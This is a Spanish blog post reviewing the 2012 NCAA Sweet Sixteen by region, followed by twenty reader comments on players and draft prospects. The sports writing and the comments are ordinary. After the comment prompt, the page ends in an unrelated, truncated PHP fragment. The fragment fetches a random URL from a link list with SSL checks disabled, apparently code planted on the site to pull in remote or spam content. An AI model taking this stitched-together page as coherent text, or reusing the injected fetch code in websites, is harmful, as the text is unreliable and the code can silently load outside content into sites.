March Madness 2012: Sweet Sixteen

19 de March de 2012 por txusma

Después de 4 días intensísimos ya tenemos a los 16 equipos que se jugarán el pase a la Final Four. Como en todas las ediciones ha habido eliminaciones sonadas, grandes actuaciones individuales y tremendas decepciones.

South Region

Kentucky ha llegado al Sweet Sixtenn venciendo cómodamente en sus 2 partidos y mostrando todo su poderío. Anthony Davis se está mostrando decisivo a ambos lados de la pista y Doron Lamb ha jugado a un buen nivel los 2 partidos. Terrence Jones apareció el primer día y Marquis Teague (hermano del jugador de los Hawks) el segundo. Michael Kidd-Gilchtrist anda desaparecido pero aún no ha sido requerida su presencia. Si había duda sobre la inexperiencia del equipo se habrán disipado en estos 2 partidos. Los Wildcats son aún más favoritos que hace 4 días.

Kentucky se las verá con Indiana que ha cumplido el guión y se ha plantado en 3ª ronda tras eliminar en un duro partido a VCU, que se cargó por sorpresa a Wichita el primer día. Una canasta ganadora anotada a falta de 12 segundos de Will Sheeney les dio la victoria y la clasificación entre los 16 mejores equipos del país por primera vez en 10 años. Liderados por Cody Zeller, los Hoosiers se han mostrado muy sólidos.

En el otro lado del cuadro Baylor se enfrentará a Xavier. Los primeros pasaron relativos problemas el primer día ante Dakota State pero vencieron cómodamente a Colorado en 2ª ronda. Brady Heslip anotó 9 triples de 12 intentos y certificó la victoria de su equipo. Perry Jones y Quincy Miller, los 2 jugadores que suenan para la 1ª ronda del draft, están decepcionando un punto sobretodo el primero. De todas maneras es algo que podía estar en el guión porque se trata de 2 jugadores muy inconsistentes.

Xavier se ha plantado en el Sweet Sixteen tras eliminar a uno de los protagonistas de la 1ª ronda, Lehigh, que se cargó sorprendetemente a Duke. El equipo de Mike Krzyzewski estuvo muy desacertado en el tiro (6 de 26 en triples) y no encontraron la manera de parar al rapidísimo Cj McCollum, uno de los mejores anotadores del país. Mason Plumee fue el único ‘Blue Devil’ que se salvó de la quema.  Pero en 2ª ronda McCollum no estuvo muy acertado y su equipo fue arrollado por Kenny Frease que se aprovechó de la debilidad en el juego interior de su rival. Los Musketeers se planta en 3ª ronda por cuarta en 5 años.

West Region

En la West Region ser dio otra de las grandes sorpresas de la 1ª ronda. Norfolk State venció a Missouri en un gran partido y mandó para casa a uno de los grandes favoritos para estar en la Final Four de New Orleans. Desgraciadamente, Florida despertó de su sueño a Norfolk State endonsándole una soberana paliza en segunda ronda. Los Gators prácticamente no han sudado en ninguno de sus 2 primeros partidos y su gran fugura, Bradley Beal, no ha tenido que exprimirse en ningún momento aunque se ha mostrado muy sólido.

Florida se enfrentará a Marquette en un enfrentamiento que se presume muy interesante. Los Golden Eagles basan todo su juego en la pareja Darius Johnson-Odom & Jaw Crowder y estos están respodiendo a la perfección. Atropellaron a BYU en el partido inaugural y fueron claves en la trabajado victoria de 2ª ronda ante Murray State.

Por el otro lado del cuadro, sin sorpresas. Michigan State y Lousiville se enfrentarán después de haber sudado más de la cuenta en 2ª ronda. El ‘Spartan’ Draymond Green es hasta el momento una de las sensaciones del torneo. Si el primer día consiguió un triple doble, en el partido de 2ª ronda se fue a los 16 puntos, 13 rebotes y 6 asistencias, incluyendo una vital en los últimos compases del encuentro para el triple de su compañero Keith Appling.

Los Cardinals se impusieron a Davidson en primera ronda ganando así un partido en el torneo por primera vez en 3 años. En 2ª ronda vencieron a Los Lobos de Mew Mexico en un partido muy trabado de poca anotación. El equipo de Rick Pitino es bastante limitado pero muy duro. No lo tendrá nada fácil Michigan State para avanzar a los Elite Eight.

East Region

Prácticamente sin sorpresas en esta parte del cuadro. Syracuse se ha sobrepuesto a la baja de Fab Melo con dos buenas victorias ante UNC-Ashville y Kansas State. Sus compañeros han dado un paso al frente incidiendo aún más en el juego de equipo que destacábamos en la previa. Dion Waiters está jugando un buen torneo saliendo desde el banco. Ahora les toca enfrentarse a Winsconsin que venció a Vanderbilt en 2ª ronda gracias a una gran defensa que secó a los 2 mejores del rival. Jeffery Taylor y John Jenkins se quedaron en 9 y 13 puntos respectivamente con un 7 de 24 entre ambos. El mejor de los Commodores fue el pívot Festus Ezeli. Por Wisconsin Jordan Taylor fue una vez más el líder anotador aunque esta vez no estuvo tan acertado como en el primer partido, en el que anotó 17 puntos, capturó 8 rebotes y repartió 6 asistencias.

Ohio State son los que se están mostrando más fuertes en esta región y emergen incluso como alternativa al poder de Kentucky. La razón principal es el gran nivel de su juego interior, con Jared Sullinger y DeShaun Thomas. En el partido de 2ª ronda se combinaron para anotar 36 puntos. Aaron Craft, del que ya comentábamos en la previa su importancia en el juego del equipo, consiguió un doble-doble. La defensa de Gonzaga les puso las cosas difíciles pero 2 canastas en los últimos minutos de Sullinger y un buen acierto desde la línea de tiros libres cerradon el partido. Ahora se veran las caras con Cincinatti que eliminó a Florida State.

MidWest Region

En esta región ha pasado de todo. Por un lado se han cumplido los pronósticos y por el otro ha habido grandes sorpresas. UNC se ha plantado en el Sweet Sixteen sin grandes problemas pero ha pagado un precio muy alto: su base titular, Kendall Marshall, se lesionó en la muñeca a mediados de la segunda parte del segundo partido y no está nada claro que pueda disputar el próximo encuentro. En todo caso le dio a tiempo a ser el mejor de su equipo con 18 puntos y 11 asistencias. Los Tar Heels pierden posiblemente a Marshall pero recuperan a John Henson que volvió de una lesión a un nivel correcto. Su vuelta condena a James McAdoo, que tan buen partido hizo el primer día, al banquillo.

En 2ª ronda se enfrentarán a Ohio, una de las grandes sorpresas del campeonato. Los Bobcats no se clasificaban para el Sweet Sixteen desde 1964. Esta vez lo han conseguido tras eliminar a Michigan en primera ronda y South Florida en segunda, en un duelo de cenicientas.

Por el otro lado del cuadro, clasificación prevista de Kansas pero con más apuros de los previsto en 2ª ronda ante Purdue. Llegaron a la media parte perdiendo de 6 puntos y no fue hasta el último minuto, en el que robaron la pelota uno abajo, que pudieron ponerse por delante definitivamente. El gran Robbie Hummel, un jugador que se ha pasado casi 2 años en blanco por sendas lesiones de rodilla, les había encasquetado 26 puntos que no fueron suficientes para conformar la que hubiera sido la gran sorpresa del campeonato.

Ahora los Jayhawks se veran las caras con el matagigantes del torneo. North Carolina State venció a San Diego State en primero ronda y a Geoergetown en segunda, rivales ambos superiores sobre el papel. Dominaron a los Hoyas durante toda la segunda parte y solo un furioso intento de remontada al final, les puso en apuros.

Comenta

20 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Tremendo curro Txus!”! Impresionante artículo. Yo no tengo ni idea de ncaa, pero me estáis provocando claramente para que me enganche, ejej. Sorprendente lo de Duke no? Que caiga en primera ronda un equipo siempre aspirante… y vaya equipito de los Wildcats. Estos tipos se renuevan como la espuma. Equipazo hace dos años con Wall, Cousins, Aminu y Bledsoe, y este año parece que también tienen 3-4 tipos muy competentes. Son uno de los favoritos al título no?

      Citar

  2. Txusma dice:
    #2

    Son EL favorito. Pueden tener a 3 jugadores en el TOP-10 y 2 más en 2ª ronda.

      Citar

  3. Sancho88 dice:
    #3

    Tb lo de Conética es un batacazo de los gordos. Ha evolucionado Jeremy Lamb? o sigue siendo un flojeras. Me gustaba Alex Oriakhi el año pasado.

      Citar

  4. Ru dice:
    #4

    Es muy fácil para estas universidades mantener su nivel ya que su status favorece su programa de reclutamiento.Como dice Txusma muy probablemente este año entre jugadores que acaban ciclo y los que den el salto se les pueden ir tranquilamente 6-7 jugadores,pues de momento han reclutado de la HS al 3º de los aleros de la nación y al 5º de los escoltas y andan detrás de los 2 mejores jugadores de la hornada del 2012: Shabazz Muhammad (al que comparan con Kobe Bryant,ojito) y Nerlens “pelazo” Noel.

      Citar

  5. Sancho88 dice:
    #5

    Venga, el próximo día me animo a ver el Wildcats-Hoosiers, que tiene muy buena pinta y además parece que habrá pesos pesados del draft ahí. Juegan el viernes a las 2:45 si no me equivoco. Ese día le doy tregua a la nba y me engancho a la march madness, a ver si me sorprende para bien

      Citar

  6. melo15 dice:
    #6

    Pues Sancho ese dia jugara un tal Michael Kidd-Gilchrist, que es el tio que necesitais, es un poco limitado como anotador pero gran defensor y muy trabajador. Pero creo que lo van a pillar los Wizards antes.

      Citar

  7. Ru dice:
    #7

    Sancho88:
    Venga, el próximo día me animo a ver el Wildcats-Hoosiers, que tiene muy buena pinta y además parece que habrá pesos pesados del draft ahí. Juegan el viernes a las 2:45 si no me equivoco. Ese día le doy tregua a la nba y me engancho a la march madness, a ver si me sorprende para bien

    Seguro que te engancha muchísimo.Siempre comentas el ambiente que hay en los partidos de los Kings,pues en la NCAA una de las mejores cosas que hay es eso,todo el mundo con las camisetas de sus equipos,animandoo..siempre lo he dicho,que en los Estados Unidos uno es más de su universidad que de su ciudad -al menos en baloncesto-.

      Citar

  8. melo15 dice:
    #8

    Pues Sancho ese dia jugara un tal Michael Kidd-Gilchrist, que es el tio que necesitais, es un poco limitado como anotador pero gran defensor y muy trabajador. Pero creo que lo van a pillar los Wizards antes. Jeremy Lamb se ha confirmado como un gran jugador en la NCAA, pero la pesima temporada de Drummond les ha condenado.

      Citar

  9. Esteban dice:
    #9

    ese davis, q bestiaaaaaaaaaa, barnes, drummond, kidd-gilchrist, lamb, sullinger, perry, q de buenos jugadores que hay

      Citar

  10. Vader dice:
    #10

    Si, Davis tiene pinta de jugador franquicia… De ser uno de esos bichos que el sólo ta hace subir 10-15 victorias. Este año el número uno del draft es un premio gordo.

      Citar

  11. Txusma dice:
    #11

    Esto de la March Madness es una loteria. Tanto te puede tocar un buen partido como un bodrio de los gordos. Aún recuerdo cuando le recomendamos a MagicJohnson32 ver una final i una semifinal que jugaba UCLA (creo que era cuando estaba Kevin Love). Al día siguiente nos llamó de todos menos bonitos!!
    Por cierto, casi todos los draff ponen como escogido a Tomas Satoranski del Banca Cívica y alguno le da primera ronda!

      Citar

  12. Kantonyo dice:
    #12

    Para mí los mejores jugadores de estas primeras rondas son:

    – Draymond Green – PF – Michigan State
    – Jae Crowder – SF – Marquette
    – Anthony Davis – PF – Kentucky – #1 Draft
    – Deshaun Thomas – SF – Ohio State
    – Kendall Marshall – PG – North Carolina

    Que pena la lesión de Marshall, su progresión era bastante buena, esperemos que solo sea un contratiempo.

    Las sorpresas para mi, sobre todo ha sido el Alapívot de los Lobos de New Mexico, Drew Gordon, aunque se haya eliminado. También la vuelta a la élite de Robbi Hummel, una de mis debilidades los últimos años, y que creíamos perdido para la causa. También eliminado.

    Los favoritos para la Final Four por mi parte son: KENTUCKY vs MARQUETTE, OHIO ST vs NORTH CAROLINA

      Citar

  13. Kantonyo dice:
    #13

    Txusma:
    Esto de la March Madness es una loteria. Tanto te puede tocar un buen partido como un bodrio de los gordos. Aún recuerdo cuando le recomendamos a MagicJohnson32 ver una final i una semifinal que jugaba UCLA (creo que era cuando estaba Kevin Love). Al día siguiente nos llamó de todos menos bonitos!!
    Por cierto, casi todos los draff ponen como escogido a Tomas Satoranski del Banca Cívica y alguno le da primera ronda!

    Yo creo que es difícil en este tipo de competición recomendar un partido. Para mi el mejor por ahora ha sido el Purdue-Kansas. Creo que el espectáculo en sí es la competición en general, y siempre según se va desarrollando pierde en emoción, quitando algunas Final Four que quedaran para la historia.

      Citar

  14. Kantonyo dice:
    #14

    Sancho88:
    Tb lo de Conética es un batacazo de los gordos. Ha evolucionado Jeremy Lamb? o sigue siendo un flojeras. Me gustaba Alex Oriakhi el año pasado.

    Jeremy Lamb ha mejorado bastante los números este año, pero si es verdad que tiene pinta de ‘flojeras’ tanto físicamente como en su caracter. Aún así, es de lo mejor de este año, sobre todo porque este año hay mucho Alapívot, mucho musculo, y jugadores como él no abundan, lo más parecido Harrison Barnes…

    Recordar que la victoria de UConn el año pasado fue una gran sorpresa, se clasificaron en el último momento por su victoria en el torneo final de la BigEast después de una temporada mala, y dieron la campanada en el MarchMadness gracias a los últimos minutos siempre de Kemba Walker. Este año ha sido algo parecido, mala temporada regular, pero sin torneo, los han clasificado para el March Madness por ‘enchufe’ o por ser los campeones, y este año no estaba Kemba.

    Jeremy no es mal jugador, pero tampoco lo veo como top5 como algunos MockDraft lo sitúan.

      Citar

  15. melo15 dice:
    #15

    Imaginaos una final North Carolina vs Kentucky, dos de las universidades mas prestigiosas, y los duelos personales serian: Teague vs Marsahll, Kidd-Gilchrist vs Barnes y Davis vs Henson, BRUTAL! Por lo demas creo que el bluff del draft sera Robinson, me recuerda a Wes Johnson, superdominante en. La NCAA por edad y fisico y batacazo en la NBA, por lo demas creo que Perry Jones no sera nadie, aunque si algun dia le diera por aprovechar su altura y incorporar un tiro de media distancia seru buenisimo. El mejor es Davis aunque ha de sumar algunos kilos y mejorar ofensivamente, y despues Michael Kidd-Gilchrist, ojala lo pillen los Wizards, porque es lo que necesitan, alero trabajador, defensor, reboteador, y cada vez mejor ofensivamente, un CRACK.
    Y nadie apuesta por Syracuse, soy fan de esta universidad desde que me entere que Melo jugo alli XD, creo que la baja de Fab Melo (pivot que era su pilar defensivo) les ha hecho mucho daño.

      Citar

  16. Sancho88 dice:
    #16

    Oye, y qué opináis de Shabazz Napier? He visto vídeos de él y me parece que puede ser una gran metralleta en la NBA. Se parece mucho a Monta Ellis.

      Citar

  17. Txusma dice:
    #17

    Kantonyo:
    Para mí los mejores jugadores de estas primeras rondas son:

    – Draymond Green – PF – Michigan State
    – Jae Crowder – SF – Marquette
    – Anthony Davis – PF – Kentucky – #1 Draft
    – Deshaun Thomas – SF – Ohio State
    – Kendall Marshall – PG – North Carolina

    Draymond Green la está rompiendo pero creo q mide 2 metros pelaos. En la NBA lo tendría complicadísimo.

      Citar

  18. kantonyo dice:
    #18

    Ya se ha jugado el Sweet Sixteen y sólo quedan 8 equipos. Han llegado 3 de los 4 cabezas de serie (sólo eliminado Michigan ST), y teniendo en cuenta que la gran sorpresa ha sido Florida (#7) podemos decir que ha sido uno de los años con menos sorpresas.

    Os resumo un poquillo quien son los 8 equipos finalistas:

    South:

    #1 Kentucky: El equipo más completo de todos, gran favoritos en la mayoría de las quinielas. Los jugadores ha seguir son unos cuantos, y además Michael Kidd-Gilchrist parece que ha resucitado con un gran partido contra Indiana:

    PF: Anthony Davis (Top 5) : 13 ptos, 11 reb, 25 eff
    PF: Terrence Jones (top 15) : 14 ptos, 9 reb, 20 eff
    SF: Darius Miller (2nda R): 15 ptos, 4 reb, 18 eff
    SF: Michael Kidd-Gilchrist (top 5): 12 ptos, 8 reb, 14 eff
    SG: Doron Lamb (2nda R): 18 ptos, 2 reb, 16 eff
    PG: Marquis Teague (top 20 – 2013): 17 ptos, 6 asis, 17 eff

    #3 Baylor: Uno de los mejores perímetros del torneo, pero se ha mostrado muy débil en la pintura, a pesar de tener a dos de las mejores promesas en esa zona. Tanto Perry Jones III como Quincy Miller deberán mejorar mucho para poder eliminar a los Wildcats de Kentucky.

    PF: Perry Jones III (top 10): 8 ptos, 7 reb, 10 eff
    PF: Quincy Miller (top 20): 8 ptos, 4 reb, 9 eff
    SF: Quincy Acy (2nda R): 10 ptos, 9 reb, 19 eff
    SG: Brady Heslip: 18 ptos, 2 reb, 18 eff
    PG: Pierre Jackson: 16 ptos, 7 asis, 17 eff

    West:

    #4 Louisville: Probablemente el equipo con menos potencial de los que han llegado al elite 8. Su juego se basa en la fuerza del pívot senegales Gorgui Dieng y en el alero de primer año Chane Behanan, una de las sorpresas agradables del torneo.

    C: Gorgui Dieng (2nd R – 2013) : 7 ptos, 9 reb, 18 eff
    SF: Chane Behanan: 13 ptos, 8 reb, 16 eff
    PG: Peyton Siva (2nd R – 2013): 9 ptos, 7 asis, 9 eff

    #7 Florida: Han logrado derrotar a uno de los jugadores más fuertes del torneo, Jae Crowder y sin demasiados problemas. Bradley Beal sigue creciendo a pasos agigantados, estamos hablando probablemente de el mejor jugador exterior del año. Uno de los equipos mejor armados tácticamente. Bastante flojo debajo del tablero.

    C: Erik Murphy : 8 ptos, 6 reb, 10 eff
    PF: Patric Young (top 10 – 2013) : 8 ptos, 5 reb, 11 eff
    SF: Casey Prather : 6 ptos, 2 reb, 8 eff
    SG: Bradley Beal (top 5) : 16 ptos, 9 reb, 3 asis, 23 eff
    SG: Kenny Boynton (2nda R – 2013): 16 ptos, 7 reb, 3, asis, 18 eff
    PG: Erving Walker : 13 ptos, 3 asis, 13 eff

      Citar

  19. kantonyo dice:
    #19

    Continuo:

    East:

    #1 Syracuse: Su potencial se basa en el conjunto, no tiene ningún jugador de renombre a priori. Con la lesión de Fab Melo están teniendo problemas en el rebote.

    PF: James Southerland: 10 ptos, 5 reb, 14 eff
    PF: Rakeem Christmas: 5 ptos, 6 reb, 10 eff
    PF: CJ Fair: 7 ptos, 4 reb, 8 eff
    SF: Kris Joseph (2nda R): 10 ptos, 4 reb, 7 eff
    SG: Dion Waiters (top 25): 14 ptos, 3 reb, 14 eff
    PG: Brandon Triche: 8 ptos, 2 asis, 6 eff

    #2 Ohio St: Su juego interior con Thomas y Sullinger es el más versátil del año, con capacidad para anotar tanto fuera como dentro de la zona. Bien dirigidos por Aaron Craft.

    PF: Jared Sullinger (top 10): 18 ptos, 9 reb, 22 eff
    SF: DeShaun Thomas (2nda R): 25 ptos, 9 reb, 26 eff
    SG: Lenzelle Smith Jr: 8 ptos, 6 reb, 12 eff
    SG: Williams Buford (2nda R): 11 ptos, 4 reb, 8 eff
    PG: Aaron Craft (2nda R – 2013): 12 ptos, 6 asis, 19 eff

    MidWest

    #1 North Carolina: Tras la lesión de Kendall Marshall ha llegado la incertidumbre al juego de los Tar Heels, que apunto han estado de perder contra la modesta Ohio. Tyler Zeller se está saliendo en el torneo.

    PF: Tyler Zeller (top 15): 16 ptos, 14 reb, 3 tap, 25 eff
    PF: John Henson (top 10): 13 ptos, 10 reb, 3 tap, 17 eff
    PF: James Michael McAdoo (top 5 – 2013): 11 ptos, 4 reb, 12 eff
    SF: Harrison Barnes (top 10) : 14 ptos, 6 reb, 9 eff
    SG: Reggie Bullock (top 30 – 2013): 12 ptos, 7 reb, 16 eff
    PG: Kendall Marshall (top 15): 14 ptos, 11 asis, 22 eff

    #2 Kansas: Los Jayhawks no han dejado una buena imagen en este torneo, en especial una de sus estrellas Tyshawn Taylor que ha estado a un pobre nivel. Ha demostrado este año saber jugar partidos igualados, fundamental para este tipo de competiciones. Una plantilla muy extensa.

    C: Jeff Whithey (top 30 – 2013): 6 ptos, 5 reb, 14 eff
    PF: Thomas Robinson (top 5) : 15 ptos, 14 reb, 19 eff
    PF: Kevin Young : 5 ptos, 4 reb, 6 eff
    SG: Travis Releford : 7 ptos, 4 reb, 8 eff
    SG: Elijah Johnson (2nd R – 2013): 15 ptos, 4 reb, 15 eff
    PG: Tyshawn Taylor (top 30) : 9 ptos, 5 reb, 3 asis, 7 eff

      Citar

  20. kantonyo dice:
    #20

    Bueno resumiendo, tenemos un interesante Elite 8, si nos basamos en el MockDraft de DraftExpress, del top 11 tenemos a 10 clasificados!!!.

    Anthony Davis, Michael Kidd-Gilchrist, Thomas Robinson, Bradley Beal, Jared Sullinger, Harrison Barnes, John Henson, Perry Jones, Tyler Zeller y Terrence Jones.

    ¿¿Quien puede pedir más??

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>